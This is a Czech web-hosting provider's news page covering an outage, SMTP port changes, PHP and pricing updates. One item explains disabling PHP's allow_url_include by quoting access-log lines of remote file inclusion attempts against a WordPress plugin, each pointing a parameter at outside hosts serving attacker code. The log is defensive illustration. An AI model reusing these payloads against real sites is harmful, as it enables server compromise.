Jelikož stále více wifi poskytovatelů, hotelů apod. blokují odesílání pošty přes standardní smtp port 25, zprovoznili jsme druhý port pro odesílání pošty, a to 10025.
Často se k těmto sítím připojují zavirované počítače rozesílající tisíce spamů denně, tím se jednak poskytovatel dostává rychle na spamový blacklist (které na našem emailserveru také používáme), a zároveň také rapidně zpomaluje rychlost internetu. Proto se mnoho poskytovatelů uchyluje k filtrování odchozích připojení na port 25, a tím pádem nelze přes náš smtp server odesílat poštu.
Opravili jsme v hostingové administraci malou chybičku, která se projevovala při automatickém zřizování MySQL účtu, a to pouze, pokud jste měli u administračního kontaktu nastaveno více emailových adres. V takovém případě email se zřízeným MySQL účtem nedošel. Nyní již vše pracuje korektně.
Dnes v ranních hodinách došlo k výpadku v poskytování našich služeb. Na vině byl výpadek elektřiny telehousu našeho hlavního serverhousingového poskytovatele Casablanca INT. Za vzniklé problémy se Vám omlouváme.
Zde otiskujeme oficiální stanovisko spol. Casablanca INT k vzniklé situaci:
Vážený zákazníci,
velice se Vám omlouváme za omezení Vašich služeb, ke kterému došlo
dnes 8.4.2009 v ranních hodinách.
Příčinou výpadku byla havárie (zkrat) na energetické síti mimo
infrastrukturu našeho Telehouse centra. Vzhledem k rozsahu havárie
naše záložní systémy musely bohužel omezit dodávku napájení do části
naší sítě, konkrétně do serveroven HC2,4,5 a 16. V této souvislosti
došlo i k přerušení části naší infrastruktury, která je umístěna
v těchto serverovnách. Funkčnost páteřní sítě nebyla přerušena.
K havárii došlo v čase 4:05, zálohované napájení bylo postupně
obnovováno v čase 4:10 – 4:30 a zákaznické služby byly s maximální
intenzitou znovu obnovovány od 4:30.
Všichni zaměstnanci naší společnosti vyvinuli ihned po havárii
maximální úsilí k co nejrychlejšímu obnovení postižených služeb.
V případě jakéhokoliv dotazu prosím kontaktujte naše technické
oddělení, tel: 270 000 235, email: tech@casablanca.cz
Omlouváme se za případné komplikace a děkujeme za pochopení.
S pozdravem,
Obchodní oddělení
Casablanca INT s.r.o.
Vinohradská 184 | Praha 3 | PSČ 130 52
Telefon: +420 270 000 270
Email: obchod@casablanca.cz | www.casablanca.cz
Z důvodu nárůstu útoků na webové aplikace jsme na všech serverech zakázali u funkce Include a Require načtení zdrojového souboru z cizího webové serveru, tj. přes http nebo ftp. Na funkce fopen() by tato změna neměla mít vliv. Pokud byste potřebovali nahrávat věci z cizího serveru, použijte buď již zmiňovanou funkci fopen() nebo file_get_contents().
Zákaz jsme provedli přes direktivu allow_url_include = Off.
A jak takový útok např. může vypadat? Ukázka z logu – komentář snad netřeba:
xxxx.cz 80.254.74.63 - - [08/Dec/2008:18:11:18 +0100] "GET /?myPath=http://www.freewebs.com/albalbo/xx.txt?? HTTP/1.1" 200 229 "-" "Mozilla/3.0 (compatible; Indy Library)"
xxxx.cz 80.254.74.63 – - [08/Dec/2008:18:11:14 +0100] „GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.freewebs.com/albalbo/xx.txt?? HTTP/1.1″ 200 229 „-“ „Mozilla/3.0 (compatible; Indy Library)“
xxxx.cz 80.254.74.63 – - [08/Dec/2008:18:14:33 +0100] „GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.freewebs.com/albalbo/xx.txt?? HTTP/1.1″ 200 229 „-“ „Mozilla/3.0 (compatible; Indy Library)“
xxxx.cz 76.162.254.213 – - [08/Dec/2008:18:58:40 +0100] „GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://pastebin.linode.com/?dl=1581??? HTTP/1.1″ 200 227 „-“ „Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1″
Dne 17. září byla uvolněna nová verze nejlepšího Open Source eshopu Magento. Verze 1.1.6 opravuje chyby v řadě 1.1.x.
Další informace na blogu tvůrců Magenta.
Dnes jsme předělali a zoptimalizovali část hostingového administračního centra a mnohonásobně tím zrychlili vytváření domén III. řádu i virt. adresářů. Zřizovat větší počet domén III. řádu je teď daleko snadnější a rychlejší.
Na přání našich klientů jsme přidali do php podporu rozšíření PDO, které umožňuje jednotný přístup k různým databázím. Podpora PDO se u nás týká databází MySQL, PostgreSQL a SQLite.
Dne 7. července 2008 došlo ke sloučení Raiffeisenbank a eBanky. Od tohoto data zaniká bankovní kód 2400 a bude nadále používán jen 5500. Platby, které uskutečníte po 7. červenci zaslané na starý bankovní kód 2400, budou automaticky přeposlány na naše nové číslo účtu – 449119001/5500. Automatické přeposlání bude funkční pouze do konce roku 2008.
Snížili a sjednotili jsme ceny všech nabízených domén. Nyní pořídíte doménu .cz i .eu za 290 Kč na rok bez dph. Nové ceny se týkají jak nové registrace domény, tak i jejího dalšího prodloužení.
Dne 25. května jsme provedli malou, byť velmi důležitou aktualizaci PHP z verze 5.2.5 na verzi 5.2.6.
Verze 5.2.6 opravuje některé zásadní chyby v PHP. Tou nejvýznamnější je oprava funkce MkDir, která se nechovala korektně pod operačním systémem FreeBSD, na kterém provozujeme tarif Online. Z tohoto důvodu nemusely správně pracovat některé moduly v Joomla! a pravděpodobně i v jiných systémech.
A jak se chyba projevovala ?
Pokud cesta v parametru funkce MkDir měla na konci lomítko, adresář se nevytvořil a php hlásilo chybu „Warning: mkdir(): Unable to access …“. Bez koncového lomítka MkDir proběhl úspěšně.
Pro názornost malý příklad:
mkdir(‘/home/nejakyweb.cz/html/obrazky/novyadresar/’); // neproběhlo
mkdir(‘/home/nejakyweb.cz/html/obrazky/novyadresar’); // proběhlo
Bug je popsán na stránkách bugs.php.net. Nejvtipnější na celé chybě je to, že měla být opravena již dávno v dřívějších verzích, ale nebyla.
Ještě poznamenejme, že aktualizace se týkala pouze serverů s tarifem Online. Starších tarifů Standard a Profi, které jedou pod operačním systémem Linux, se chyba netýkala.
